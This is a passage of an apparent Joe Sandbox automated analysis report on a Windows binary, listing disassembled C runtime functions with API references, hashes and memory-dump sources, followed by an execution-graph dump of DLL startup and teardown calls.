                                                                                                                                                                                            • Opcode ID: 56b24ddd386cd44f45507306ed0a2fcb6a86b7d9410112049b50e215a1b2d51e
                                                                                                                                                                                            • Instruction ID: 896479d7ce6e22c89144b21afa39143437be76e106a168b5d71124ff9ab764a0
                                                                                                                                                                                            • Opcode Fuzzy Hash: 56b24ddd386cd44f45507306ed0a2fcb6a86b7d9410112049b50e215a1b2d51e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E21D476600509ABD704DF68C885AAEFFBDFF85310F10855AF9449B341E771AD858BA0
                                                                                                                                                                                            Function 00566797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _free
                                                                                                                                                                                            • String ID: l=W
                                                                                                                                                                                            • API String ID: 269201875-560687039
                                                                                                                                                                                            • Opcode ID: a1a946c62be6859469d18d669b8c80c9ede53f2ee440bf72ee6fdeff90d88475
                                                                                                                                                                                            • Instruction ID: 0c601c0ab13e831d85b60448cff40019277d48918a2697696e41ffada7a307ec
                                                                                                                                                                                            • Opcode Fuzzy Hash: a1a946c62be6859469d18d669b8c80c9ede53f2ee440bf72ee6fdeff90d88475
                                                                                                                                                                                            • Instruction Fuzzy Hash: 46F0AF32508312AEE7112A61AC86BA73F9CFB81775F20043AF80CAB143DA61684146B5
                                                                                                                                                                                            Function 0054F7F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0054F7FC
                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0054F857
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                            • String ID: @0S
                                                                                                                                                                                            • API String ID: 593203224-2734645871
                                                                                                                                                                                            • Opcode ID: 92ad1f66b45990b0dc4a177f19bea95f850727d32a24c914be11eff3937edcad
                                                                                                                                                                                            • Instruction ID: 9aa5b1636c479fa259e31b14a45db1933e2e39df208873efa0042b2ee715a1cb
                                                                                                                                                                                            • Opcode Fuzzy Hash: 92ad1f66b45990b0dc4a177f19bea95f850727d32a24c914be11eff3937edcad
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9D015E35600205AFCB05DF18C895D9DBF79FF84714B1400A9E8019F3A1EB70EE40DB90
                                                                                                                                                                                            Function 00532070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00532078
                                                                                                                                                                                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 005320BC
                                                                                                                                                                                              • Part of subcall function 0054F860: _Yarn.LIBCPMT ref: 0054F87F
                                                                                                                                                                                              • Part of subcall function 0054F860: _Yarn.LIBCPMT ref: 0054F8A3
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                                            • String ID: bad locale name
                                                                                                                                                                                            • API String ID: 1908188788-1405518554
                                                                                                                                                                                            • Opcode ID: f5a61fb4ff17cfbd21503167dee8cf5406c31fadb32973de655b1b5712af8ade
                                                                                                                                                                                            • Instruction ID: cbd2506006c9eed543062d1c07f38f39e4a82e270a4588198cb0b9da3ad2956b
                                                                                                                                                                                            • Opcode Fuzzy Hash: f5a61fb4ff17cfbd21503167dee8cf5406c31fadb32973de655b1b5712af8ade
                                                                                                                                                                                            • Instruction Fuzzy Hash: 24F0F971101B509EE3709F7A9409783BEE4AF25714F044A2DE58AC7A42E775E508CBA5
                                                                                                                                                                                            Function 00557DDF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38threadCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetLastError.KERNEL32(0057D3B0,0000000C), ref: 00557DF2
                                                                                                                                                                                            • ExitThread.KERNEL32 ref: 00557DF9
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorExitLastThread
                                                                                                                                                                                            • String ID: @0S
                                                                                                                                                                                            • API String ID: 1611280651-2734645871
                                                                                                                                                                                            • Opcode ID: 4366152040101a8d496d82fdbcef0e3a16ffc43e8683f443535fe2688e676334
                                                                                                                                                                                            • Instruction ID: f89585854c061751ae60a34adeb57f1ea9ca491b172208d787067f5710ff901b
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4366152040101a8d496d82fdbcef0e3a16ffc43e8683f443535fe2688e676334
                                                                                                                                                                                            • Instruction Fuzzy Hash: 06F0FF7190020AAFDB00AFB0C82FA2E3F74FF85712F20054AF8059B291CB706809DBA1
                                                                                                                                                                                            Function 0054F0D3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30sleepCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Sleep.KERNEL32(00001388), ref: 0054F11B
                                                                                                                                                                                            • ___std_exception_destroy.LIBVCRUNTIME ref: 0054F132
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Sleep___std_exception_destroy
                                                                                                                                                                                            • String ID: Unknown exception
                                                                                                                                                                                            • API String ID: 2427919145-410509341
                                                                                                                                                                                            • Opcode ID: 126fa565021b36db18fc74235e512c8fe88d60c5aa849e166d87ffde372a30b4
                                                                                                                                                                                            • Instruction ID: 5d20a3f1e86636855fcda741c54bb541c3020ec65b394ad960db88e1afe9b6e3
                                                                                                                                                                                            • Opcode Fuzzy Hash: 126fa565021b36db18fc74235e512c8fe88d60c5aa849e166d87ffde372a30b4
                                                                                                                                                                                            • Instruction Fuzzy Hash: 50F089B470021157D744EB64DC6AB6E7EE5BFC8704F80009CF5499B282EA605E488B7A
                                                                                                                                                                                            Function 0055D4B8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0055DD21,-00000020,00000FA0,00000000,00000000,00000000,00000000,00531C72), ref: 0055D4F8
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CountCriticalInitializeSectionSpin
                                                                                                                                                                                            • String ID: @0S$InitializeCriticalSectionEx
                                                                                                                                                                                            • API String ID: 2593887523-1066972758
                                                                                                                                                                                            • Opcode ID: 9c217a5cbc0498e090ce197daa17d63f31531f4994abdca063ddef146a1ee392
                                                                                                                                                                                            • Instruction ID: cac9157a8aada71dd5d3c8994da4384d363d4152c1e8eccc1f4434efc339a5cf
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9c217a5cbc0498e090ce197daa17d63f31531f4994abdca063ddef146a1ee392
                                                                                                                                                                                            • Instruction Fuzzy Hash: A8E09236141229F7DF222F41EC0AC9EBF26FB40B61B04C021FD1D162B1DBB28925F6A0
                                                                                                                                                                                            Function 0055D33E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22memoryCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Alloc
                                                                                                                                                                                            • String ID: @0S$FlsAlloc
                                                                                                                                                                                            • API String ID: 2773662609-2747271807
                                                                                                                                                                                            • Opcode ID: f9a7b41bdc714f6010c3359b959982d76c2a8132ed88a39159df1d2167b05e8e
                                                                                                                                                                                            • Instruction ID: 689d130f5fac978268827926f3cfe3bd5150a4a818a02af3dc2befea866caea6
                                                                                                                                                                                            • Opcode Fuzzy Hash: f9a7b41bdc714f6010c3359b959982d76c2a8132ed88a39159df1d2167b05e8e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 98E0C2766C2A24B3C3212A95AC1AD5F7E58FBA0F72B054822FD0D522819AB14A05B1E3

                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                            Execution Coverage:19.6%
                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                            Signature Coverage:1.3%
                                                                                                                                                                                            Total number of Nodes:600
                                                                                                                                                                                            Total number of Limit Nodes:11
                                                                                                                                                                                            execution_graph 14067 6c787fbe 14068 6c787fcc 14067->14068 14069 6c787fc7 14067->14069 14073 6c787e88 14068->14073 14084 6c788150 14069->14084 14076 6c787e94 __FrameHandler3::FrameUnwindToState 14073->14076 14074 6c787ea3 14075 6c787ebd dllmain_raw 14075->14074 14077 6c787ed7 dllmain_crt_dispatch 14075->14077 14076->14074 14076->14075 14081 6c787eb8 __DllMainCRTStartup@12 14076->14081 14077->14074 14077->14081 14078 6c787f29 14078->14074 14079 6c787f32 dllmain_crt_dispatch 14078->14079 14079->14074 14080 6c787f45 dllmain_raw 14079->14080 14080->14074 14081->14078 14088 6c787dd8 14081->14088 14083 6c787f1e dllmain_raw 14083->14078 14085 6c788166 14084->14085 14087 6c78816f 14085->14087 14404 6c788103 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 14085->14404 14087->14068 14090 6c787de4 __FrameHandler3::FrameUnwindToState __DllMainCRTStartup@12 14088->14090 14089 6c787ded 14089->14083 14090->14089 14091 6c787e80 14090->14091 14092 6c787e15 14090->14092 14132 6c7884ba IsProcessorFeaturePresent 14091->14132 14111 6c7882eb 14092->14111 14095 6c787e1a 14120 6c7881a7 14095->14120 14097 6c787e87 __FrameHandler3::FrameUnwindToState 14098 6c787ebd dllmain_raw 14097->14098 14106 6c787eb8 __DllMainCRTStartup@12 14097->14106 14108 6c787ea3 14097->14108 14100 6c787ed7 dllmain_crt_dispatch 14098->14100 14098->14108 14099 6c787e1f __RTC_Initialize __DllMainCRTStartup@12 14123 6c78848c 14099->14123 14100->14106 14100->14108 14104 6c787f29 14105 6c787f32 dllmain_crt_dispatch 14104->14105 14104->14108 14107 6c787f45 dllmain_raw 14105->14107 14105->14108 14106->14104 14109 6c787dd8 __DllMainCRTStartup@12 81 API calls 14106->14109 14107->14108 14108->14083 14110 6c787f1e dllmain_raw 14109->14110 14110->14104 14112 6c7882f0 ___scrt_release_startup_lock 14111->14112 14113 6c7882f4 14112->14113 14117 6c788300 __DllMainCRTStartup@12 14112->14117 14136 6c78b792 14113->14136 14115 6c7882fe 14115->14095 14116 6c78830d 14116->14095 14117->14116 14140 6c78af7b 14117->14140 14277 6c78912a InterlockedFlushSList 14120->14277 14124 6c788498 14123->14124 14125 6c787e3e 14124->14125 14284 6c78b93b 14124->14284 14129 6c787e7a 14125->14129 14127 6c7884a6 14289 6c78917f 14127->14289 14387 6c78830e 14129->14387 14133 6c7884d0 __CreateFrameInfo 14132->14133 14134 6c78857b IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14133->14134 14135 6c7885bf __CreateFrameInfo 14134->14135 14135->14097 14137 6c78b79e __EH_prolog3 14136->14137 14151 6c78b65d 14137->14151 14139 6c78b7c5 __DllMainCRTStartup@12 14139->14115 14141 6c78afa8 14140->14141 14142 6c78afb9 14140->14142 14222 6c78b043 GetModuleHandleW 14141->14222 14229 6c78ae2b 14142->14229 14147 6c78aff7 14147->14095 14152 6c78b669 __FrameHandler3::FrameUnwindToState 14151->14152 14159 6c78c386 EnterCriticalSection 14152->14159 14154 6c78b677 14160 6c78b6b8 14154->14160 14159->14154 14161 6c78b6d7 14160->14161 14162 6c78b684 14160->14162 14161->14162 14167 6c78c7a7 14161->14167 14164 6c78b6ac 14162->14164 14221 6c78c3ce LeaveCriticalSection 14164->14221 14166 6c78b695 14166->14139 14168 6c78c7dc 14167->14168 14169 6c78c7b2 HeapFree 14167->14169 14168->14162 14169->14168 14170 6c78c7c7 GetLastError 14169->14170 14171 6c78c7d4 __dosmaperr 14170->14171 14173 6c78c737 14171->14173 14176 6c78c1ab GetLastError 14173->14176 14175 6c78c73c 14175->14168 14177 6c78c1c7 14176->14177 14178 6c78c1c1 14176->14178 14182 6c78c1cb SetLastError 14177->14182 14204 6c78e0ca 14177->14204 14199 6c78e08b 14178->14199 14182->14175 14186 6c78c200 14188 6c78e0ca __dosmaperr 6 API calls 14186->14188 14187 6c78c211 14189 6c78e0ca __dosmaperr 6 API calls 14187->14189 14193 6c78c20e 14188->14193 14190 6c78c21d 14189->14190 14191 6c78c238 14190->14191 14192 6c78c221 14190->14192 14216 6c78be59 14191->14216 14194 6c78e0ca __dosmaperr 6 API calls 14192->14194 14195 6c78c7a7 ___free_lconv_mon 12 API calls 14193->14195 14194->14193 14195->14182 14198 6c78c7a7 ___free_lconv_mon 12 API calls 14198->14182 14200 6c78df28 __dosmaperr 5 API calls 14199->14200 14201 6c78e0a7 14200->14201 14202 6c78e0c2 TlsGetValue 14201->14202 14203 6c78e0b0 14201->14203 14203->14177 14205 6c78df28 __dosmaperr 5 API calls 14204->14205 14206 6c78e0e6 14205->14206 14207 6c78c1e3 14206->14207 14208 6c78e104 TlsSetValue 14206->14208 14207->14182 14209 6c78c74a 14207->14209 14214 6c78c757 __dosmaperr 14209->14214 14210 6c78c797 14213 6c78c737 __dosmaperr 13 API calls 14210->14213 14211 6c78c782 HeapAlloc 14212 6c78c1f8 14211->14212 14211->14214 14212->14186 14212->14187 14213->14212 14214->14210 14214->14211 14215 6c78e4e4 __dosmaperr EnterCriticalSection LeaveCriticalSection 14214->14215 14215->14214 14217 6c78bced __dosmaperr EnterCriticalSection LeaveCriticalSection 14216->14217 14218 6c78bec7 14217->14218 14219 6c78bdff __dosmaperr 14 API calls 14218->14219 14220 6c78bef0 14219->14220 14220->14198 14221->14166 14223 6c78afad 14222->14223 14223->14142 14224 6c78b09e GetModuleHandleExW 14223->14224 14225 6c78b0dd GetProcAddress 14224->14225 14228 6c78b0f1 14224->14228 14225->14228 14226 6c78b10d 14226->14142 14227 6c78b104 FreeLibrary 14227->14226 14228->14226 14228->14227 14230 6c78ae37 __FrameHandler3::FrameUnwindToState 14229->14230 14244 6c78c386 EnterCriticalSection 14230->14244 14232 6c78ae41 14245 6c78ae93 14232->14245 14234 6c78ae4e 14249 6c78ae6c 14234->14249 14237 6c78b012 14253 6c78b085 14237->14253 14239 6c78b01c 14240 6c78b030 14239->14240 14241 6c78b020 GetCurrentProcess TerminateProcess 14239->14241 14242 6c78b09e __CreateFrameInfo 3 API calls 14240->14242 14241->14240 14243 6c78b038 ExitProcess 14242->14243 14244->14232 14246 6c78ae9f __FrameHandler3::FrameUnwindToState __CreateFrameInfo 14245->14246 14247 6c78b792 __DllMainCRTStartup@12 14 API calls 14246->14247 14248 6c78af03 __CreateFrameInfo 14246->14248 14247->14248 14248->14234 14252 6c78c3ce LeaveCriticalSection 14249->14252 14251 6c78ae5a 14251->14147 14251->14237 14252->14251 14256 6c78c40a 14253->14256 14255 6c78b08a __CreateFrameInfo 14255->14239 14257 6c78c419 __CreateFrameInfo 14256->14257 14258 6c78c426 14257->14258 14260 6c78dfad 14257->14260 14258->14255 14263 6c78df28 14260->14263 14262 6c78dfc9 14262->14258 14264 6c78df58 14263->14264 14268 6c78df54 __dosmaperr 14263->14268 14264->14268 14269 6c78de5d 14264->14269 14267 6c78df72 GetProcAddress 14267->14268 14268->14262 14275 6c78de6e ___vcrt_FlsGetValue 14269->14275 14270 6c78df04 14270->14267 14270->14268 14271 6c78de8c LoadLibraryExW 14272 6c78df0b 14271->14272 14273 6c78dea7 GetLastError 14271->14273 14272->14270 14274 6c78df1d FreeLibrary 14272->14274 14273->14275 14274->14270 14275->14270 14275->14271 14276 6c78deda LoadLibraryExW 14275->14276 14276->14272 14276->14275 14278 6c78913a 14277->14278 14280 6c7881b1 14277->14280 14278->14280 14281 6c78b9b9 14278->14281 14280->14099 14282 6c78c7a7 ___free_lconv_mon 14 API calls 14281->14282 14283 6c78b9d1 14282->14283 14283->14278 14285 6c78b958 ___scrt_uninitialize_crt 14284->14285 14286 6c78b946 14284->14286 14285->14127 14287 6c78b954 14286->14287 14295 6c78eb79 14286->14295 14287->14127 14290 6c789188 14289->14290 14291 6c789192 14289->14291 14362 6c789601 14290->14362 14291->14125 14298 6c78ea0a 14295->14298 14301 6c78e95e 14298->14301 14302 6c78e96a __FrameHandler3::FrameUnwindToState 14301->14302 14309 6c78c386 EnterCriticalSection 14302->14309 14304 6c78e9e0 14318 6c78e9fe 14304->14318 14308 6c78e974 ___scrt_uninitialize_crt 14308->14304 14310 6c78e8d2 14308->14310 14309->14308 14311 6c78e8de __FrameHandler3::FrameUnwindToState 14310->14311 14321 6c78ec96 EnterCriticalSection 14311->14321 14313 6c78e8e8 ___scrt_uninitialize_crt 14314 6c78e921 14313->14314 14322 6c78eb14 14313->14322 14333 6c78e952 14314->14333 14361 6c78c3ce LeaveCriticalSection 14318->14361 14320 6c78e9ec 14320->14287 14321->14313 14323 6c78eb29 ___std_exception_copy 14322->14323 14324 6c78eb3b 14323->14324 14325 6c78eb30 14323->14325 14336 6c78eaab 14324->14336 14326 6c78ea0a ___scrt_uninitialize_crt 68 API calls 14325->14326 14329 6c78eb36 ___std_exception_copy 14326->14329 14329->14314 14331 6c78eb5c 14349 6c7901b5 14331->14349 14360 6c78ecaa LeaveCriticalSection 14333->14360 14335 6c78e940 14335->14308 14337 6c78eaeb 14336->14337 14338 6c78eac4 14336->14338 14337->14329 14342 6c78eefb 14337->14342 14338->14337 14339 6c78eefb ___scrt_uninitialize_crt 29 API calls 14338->14339 14340 6c78eae0 14339->14340 14341 6c7909d4 ___scrt_uninitialize_crt 64 API calls 14340->14341 14341->14337 14343 6c78ef1c 14342->14343 14344 6c78ef07 14342->14344 14343->14331 14345 6c78c737 __dosmaperr 14 API calls 14344->14345 14346 6c78ef0c 14345->14346 14347 6c78c656 ___std_exception_copy 29 API calls 14346->14347 14348 6c78ef17 14347->14348 14348->14331 14350 6c7901d3 14349->14350 14351 6c7901c6 14349->14351 14353 6c79021c 14350->14353 14355 6c7901fa 14350->14355 14352 6c78c737 __dosmaperr 14 API calls 14351->14352 14359 6c7901cb 14352->14359 14354 6c78c737 __dosmaperr 14 API calls 14353->14354 14356 6c790221 14354->14356 14357 6c790113 ___scrt_uninitialize_crt 33 API calls 14355->14357 14358 6c78c656 ___std_exception_copy 29 API calls 14356->14358 14357->14359 14358->14359 14359->14329 14360->14335 14361->14320 14363 6c78918d 14362->14363 14364 6c78960b 14362->14364 14366 6c789658 14363->14366 14370 6c789b98 14364->14370 14367 6c789682 14366->14367 14368 6c789663 14366->14368 14367->14291 14369 6c78966d DeleteCriticalSection 14368->14369 14369->14367 14369->14369 14375 6c789a72 14370->14375 14373 6c789bca TlsFree 14374 6c789bbe 14373->14374 14374->14363 14376 6c789a8f 14375->14376 14377 6c789a93 14375->14377 14376->14373 14376->14374 14377->14376 14378 6c789afb GetProcAddress 14377->14378 14380 6c789aec 14377->14380 14382 6c789b12 LoadLibraryExW 14377->14382 14378->14376 14380->14378 14381 6c789af4 FreeLibrary 14380->14381 14381->14378 14383 6c789b29 GetLastError 14382->14383 14384 6c789b59 14382->14384 14383->14384 14385 6c789b34 ___vcrt_FlsGetValue 14383->14385 14384->14377 14385->14384 14386 6c789b4a LoadLibraryExW 14385->14386 14386->14377 14392 6c78b96b 14387->14392 14390 6c789601 ___vcrt_uninitialize_ptd 6 API calls 14391 6c787e7f 14390->14391 14391->14089 14395 6c78c32b 14392->14395 14396 6c788315 14395->14396 14397 6c78c335 14395->14397 14396->14390 14399 6c78e04c 14397->14399 14400 6c78df28 __dosmaperr 5 API calls 14399->14400 14401 6c78e068 14400->14401 14402 6c78e071 14401->14402 14403 6c78e083 TlsFree 14401->14403 14402->14396 14404->14087 14405 6c787c7e 14406 6c787c89 14405->14406 14407 6c787cbc 14405->14407 14409 6c787cae 14406->14409 14410 6c787c8e 14406->14410 14408 6c787dd8 __DllMainCRTStartup@12 86 API calls 14407->14408 14416 6c787c98 14408->14416 14417 6c787cd1 14409->14417 14411 6c787c93 14410->14411 14412 6c787ca4 14410->14412 14411->14416 14431 6c7882aa 14411->14431 14436 6c78828b 14412->14436 14418 6c787cdd __FrameHandler3::FrameUnwindToState 14417->14418 14444 6c78831b 14418->14444 14420 6c787ce4 __DllMainCRTStartup@12 14421 6c787d0b 14420->14421 14422 6c787dd0 14420->14422 14428 6c787d47 ___scrt_is_nonwritable_in_current_image __CreateFrameInfo 14420->14428 14455 6c78827d 14421->14455 14424 6c7884ba __DllMainCRTStartup@12 4 API calls 14422->14424 14425 6c787dd7 14424->14425 14426 6c787d1a __RTC_Initialize 14426->14428 14458 6c78819b InitializeSListHead 14426->14458 14428->14416 14429 6c787d28 14429->14428 14459 6c788252 14429->14459 14520 6c78b933 14431->14520 14723 6c78916c 14436->14723 14439 6c788294 14439->14416 14442 6c7882a7 14442->14416 14443 6c789177 21 API calls 14443->14439 14445 6c788324 14444->14445 14463 6c788678 IsProcessorFeaturePresent 14445->14463 14449 6c788335 14450 6c788339 14449->14450 14473 6c78b916 14449->14473 14450->14420 14453 6c788350 14453->14420 14454 6c78917f ___scrt_uninitialize_crt 7 API calls 14454->14450 14514 6c788354 14455->14514 14457 6c788284 14457->14426 14458->14429 14460 6c788257 ___scrt_release_startup_lock 14459->14460 14461 6c788678 IsProcessorFeaturePresent 14460->14461 14462 6c788260 14460->14462 14461->14462 14462->14428 14464 6c788330 14463->14464 14465 6c78914d 14464->14465 14476 6c78961c 14465->14476 14468 6c789156 14468->14449 14470 6c78915e 14471 6c789169 14470->14471 14472 6c789658 ___vcrt_uninitialize_locks DeleteCriticalSection 14470->14472 14471->14449 14472->14468 14505 6c78e43c 14473->14505 14477 6c789625 14476->14477 14479 6c78964e 14477->14479 14480 6c789152 14477->14480 14490 6c789c4c 14477->14490 14481 6c789658 ___vcrt_uninitialize_locks DeleteCriticalSection 14479->14481 14480->14468 14482 6c7895ce 14480->14482 14481->14480 14495 6c789b5d 14482->14495 14485 6c7895e3 14485->14470 14488 6c7895fe 14488->14470 14489 6c789601 ___vcrt_uninitialize_ptd 6 API calls 14489->14485 14491 6c789a72 ___vcrt_FlsGetValue 5 API calls 14490->14491 14492 6c789c66 14491->14492 14493 6c789c84 InitializeCriticalSectionAndSpinCount 14492->14493 14494 6c789c6f 14492->14494 14493->14494 14494->14477 14496 6c789a72 ___vcrt_FlsGetValue 5 API calls 14495->14496 14497 6c789b77 14496->14497 14498 6c789b90 TlsAlloc 14497->14498 14499 6c7895d8 14497->14499 14499->14485 14500 6c789c0e 14499->14500 14501 6c789a72 ___vcrt_FlsGetValue 5 API calls 14500->14501 14502 6c789c28 14501->14502 14503 6c789c43 TlsSetValue 14502->14503 14504 6c7895f1 14502->14504 14503->14504 14504->14488 14504->14489 14506 6c78e44c 14505->14506 14507 6c788342 14505->14507 14506->14507 14509 6c78e300 14506->14509 14507->14453 14507->14454 14510 6c78e307 14509->14510 14511 6c78e34a GetStdHandle 14510->14511 14512 6c78e3ac 14510->14512 14513 6c78e35d GetFileType 14510->14513 14511->14510 14512->14506 14513->14510 14515 6c788360 14514->14515 14516 6c788364 14514->14516 14515->14457 14517 6c7884ba __DllMainCRTStartup@12 4 API calls 14516->14517 14519 6c788371 ___scrt_release_startup_lock 14516->14519 14518 6c7883da 14517->14518 14519->14457 14526 6c78c02e 14520->14526 14523 6c789177 14706 6c789503 14523->14706 14527 6c78c038 14526->14527 14528 6c7882af 14526->14528 14529 6c78e08b __dosmaperr 6 API calls 14527->14529 14528->14523 14530 6c78c03f 14529->14530 14530->14528 14531 6c78e0ca __dosmaperr 6 API calls 